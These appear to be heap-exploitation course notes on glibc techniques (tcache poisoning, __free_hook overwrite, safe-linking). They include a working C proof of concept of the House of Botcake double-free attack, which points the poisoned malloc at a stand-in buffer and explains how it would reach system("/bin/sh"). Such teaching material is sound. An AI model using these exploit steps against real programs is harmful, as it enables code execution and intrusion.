Daily Reminder: Mom's Spaghetti
Our compass through all of this is the desire for the following comfort food:
- CONQUER ADDRESS RANDOMIZATION with a USE-AFTER-FREE: read the bin pointers left inside a free'd chunk to leak a glibc address
- WRITE-WHAT-WHERE with TCACHE POISONING: corrupt a free'd chunk's next pointer so malloc hands back an address inside glibc
- CONTROL THE INSTRUCTION POINTER by overwriting glibc's __free_hook with system, then freeing a chunk whose contents are "/bin/sh" so that free(chunk) becomes system("/bin/sh")
You've done baseline mom's, so now we're moving into new techniques for different constraints:
- glibc 2.32 introduces "encryption" to tcache (safe-linking): the next pointer of a free'd tcache or fastbin chunk is XORed with its own address shifted right by 12, so a poisoned pointer has to be mangled the same way
- **No UAF but has Double Free...**
- glibc 2.34+ has no __free_hook (or __malloc_hook) to overwrite
- Can't control the size of your mallocs
- Only a chunk overflow (write past the end of one chunk into the next)
- Only a poison null byte (an off-by-one that clears the low byte of the next chunk's size field)
Class ???: Double-Free not UAF
House of Botcake
So our goal is this:
- Fill a tcache bin for a size above the fastbin range (0x100 requests, 0x110 chunks): seven frees and the bin is full
- Free a victim chunk (the bin is full, so it lands in the unsorted bin), then free the chunk right before it: the two consolidate into one bigger chunk in the unsorted bin
- Make room in the tcache bin with one malloc
- FREE the victim AGAIN (the double free): its key field was overwritten by the unsorted-bin link, so glibc's tcache double-free check does not fire, and the victim goes into the tcache bin even though it now sits inside the consolidated chunk
- Ask for a larger chunk: it is carved from the consolidated chunk and OVERLAPS the victim
Writing into that big in-use chunk now edits the victim while it sits free in the tcache, which is exactly the primitive tcache poisoning needs, and from here we resume mom's spaghetti.
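The whole dance as an added C example (written for this page, not the course's playground code), assuming glibc 2.31 as the target. The names house_of_botcake, CHUNK_REQ, has_safe_linking and protect_ptr are my own; fake_hook is a global that stands in for __free_hook, so the poisoning step ends in a harmless buffer instead of a shell. The safe-linking helper is included so the same poisoning step also runs on 2.32+, where the next pointer must be mangled.

```c
// House of Botcake: double free -> overlapping chunks -> tcache poisoning.
// Added example for this page; assumes glibc 2.31 (also handles 2.32+ safe-linking).
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <gnu/libc-version.h>

#define CHUNK_REQ  0x100              /* request size: chunk is 0x110, tcache range, above fastbins */
#define CHUNK_SZ   (CHUNK_REQ + 0x10) /* header + user data */
#define TCACHE_MAX 7                  /* default entries per tcache bin */

/* Hypothetical poisoning target standing in for __free_hook (which 2.34+ removed). */
static uint64_t fake_hook[4] __attribute__((aligned(16)));
static void *volatile sink;           /* keeps the padding malloc alive under -O2 */

/* glibc >= 2.32 mangles tcache next pointers: stored = (&slot >> 12) ^ ptr (safe-linking). */
static int has_safe_linking(void)
{
    int major = 0, minor = 0;
    sscanf(gnu_get_libc_version(), "%d.%d", &major, &minor);
    return major > 2 || (major == 2 && minor >= 32);
}

/* Value to write into a tcache next-pointer slot so that it decodes to target. */
static uint64_t protect_ptr(void *slot, void *target)
{
    uint64_t t = (uint64_t)(uintptr_t)target;
    return has_safe_linking() ? (((uint64_t)(uintptr_t)slot >> 12) ^ t) : t;
}

/* Returns 0 when the overlap and the poisoned malloc both land; otherwise the failing step.
 * Call once per process: it deliberately leaves the heap in an exploited state. */
int house_of_botcake(void)
{
    char *filler[TCACHE_MAX], *prev, *victim, *spare, *big;

    for (int i = 0; i < TCACHE_MAX; i++) filler[i] = malloc(CHUNK_REQ);
    prev   = malloc(CHUNK_REQ);       /* immediately below victim */
    victim = malloc(CHUNK_REQ);       /* the chunk we will free twice */
    sink   = malloc(0x10);            /* padding so victim never consolidates into top */
    memset(victim, 0, 0x20);          /* fresh key field: tcache double-free check must not match by accident */

    for (int i = 0; i < TCACHE_MAX; i++) free(filler[i]); /* tcache[0x110] is now full */
    free(victim);                     /* bin full -> unsorted bin; victim's key now holds the bin pointer */
    free(prev);                       /* prev sees victim free behind it -> one 0x220 chunk in unsorted */
    spare = malloc(CHUNK_REQ);        /* take one entry out of the tcache: room for one more */
    free(victim);                     /* DOUBLE FREE: key != tcache key, so victim enters the tcache */
    big = malloc(CHUNK_REQ * 2);      /* 0x210 request served from the 0x220 chunk: starts at prev */

    if (big != prev) return 1;
    if (big + CHUNK_SZ != victim) return 2;   /* victim's user data starts 0x110 bytes into big */

    /* Tcache poisoning through the overlap: victim's next pointer is big[0x110..0x118). */
    uint64_t *next_slot = (uint64_t *)(big + CHUNK_SZ);
    *next_slot = protect_ptr(next_slot, fake_hook);
    /* Re-link the rest of the bin behind the fake target so later 0x110 mallocs stay sane. */
    fake_hook[0] = protect_ptr(fake_hook, filler[5]);

    if (malloc(CHUNK_REQ) != victim) return 3;            /* first: the double-freed victim */
    if (malloc(CHUNK_REQ) != (void *)fake_hook) return 4; /* second: our target, i.e. the hook */
    (void)spare;
    return 0;
}

int main(void)
{
    int rc = house_of_botcake();
    printf("house of botcake: %s (step %d)\n",
           rc == 0 ? "overlap + poisoned malloc landed" : "failed", rc);
    return rc;
}
```

Against the real target the second malloc would return __free_hook and the exploit would write the address of system there; the padding chunk and the memset are there only so the demo does not depend on whatever sat in the heap before it ran.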
Our Target: This but glibc 2.31
Appendix
Our HEAP PLAYGROUND:
Heap Reference Guides: